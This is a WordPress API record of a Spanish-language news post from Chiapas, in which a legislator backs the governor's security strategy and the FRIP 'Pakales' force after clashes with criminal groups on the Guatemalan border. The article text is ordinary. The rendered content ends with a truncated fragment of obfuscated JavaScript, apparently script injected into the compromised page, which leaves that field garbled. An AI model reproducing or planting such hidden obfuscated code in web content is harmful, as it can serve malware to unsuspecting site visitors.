{"id":22355,"date":"2025-06-11T03:48:26","date_gmt":"2025-06-11T03:48:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22355"},"modified":"2025-06-11T03:48:27","modified_gmt":"2025-06-11T03:48:27","slug":"respaldan-legisladores-actuar-de-los-pakales-contra-la-delincuencia-organizada","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22355","title":{"rendered":"Respaldan legisladores actuar de los Pakales contra la delincuencia organizada"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000162799.jpg\" alt=\"\" class=\"wp-image-22356\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000162799.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000162799-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>10 de junio del 2025. Tuxtla Guti\u00e9rrez.- El diputado Mario Guill\u00e9n Guill\u00e9n, presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica del Congreso del Estado de Chiapas, expres\u00f3 su respaldo total a la estrategia de seguridad implementada por el gobernador Eduardo Ram\u00edrez Aguilar, quien \u2014afirm\u00f3\u2014 busca apaciguar la situaci\u00f3n en el estado mediante el di\u00e1logo y la firmeza.<\/p>\n\n\n\n<p>Guill\u00e9n tambi\u00e9n destac\u00f3 que comprende la postura de la presidenta de la Rep\u00fablica ante la compleja situaci\u00f3n en la frontera sur del pa\u00eds.<\/p>\n\n\n\n<p>Estas declaraciones surgen tras los recientes hechos registrados en la l\u00ednea fronteriza entre Chiapas y Guatemala, donde elementos de la Fuerza de Reacci\u00f3n Inmediata Pakal (FRIP), conocidos como Los Pakales, realizaron un operativo tras enfrentamientos con grupos criminales que operan en la zona.<\/p>\n\n\n\n<p>El legislador subray\u00f3 que los elementos de la FRIP actuaron en defensa del pueblo chiapaneco y en memoria de sus compa\u00f1eros ca\u00eddos durante los tr\u00e1gicos eventos del pasado 2 de junio.<\/p>\n\n\n\n<p>\u201cRespaldamos firmemente a quienes cuidan la paz en Chiapas. Su labor es por el bien de todos los chiapanecos\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 10 de junio del 2025. Tuxtla Guti\u00e9rrez.- El diputado Mario Guill\u00e9n Guill\u00e9n, presidente de la Junta de Coordinaci\u00f3n Pol\u00edtica del Congreso del Estado de Chiapas, expres\u00f3 su respaldo total a la estrategia de seguridad implementada por el gobernador Eduardo Ram\u00edrez Aguilar, quien \u2014afirm\u00f3\u2014 busca apaciguar la situaci\u00f3n en el estado mediante el di\u00e1logo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22356,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22355","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22355","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22355"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22355\/revisions"}],"predecessor-version":[{"id":22357,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22355\/revisions\/22357"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22356"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22355"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22355"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22355"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}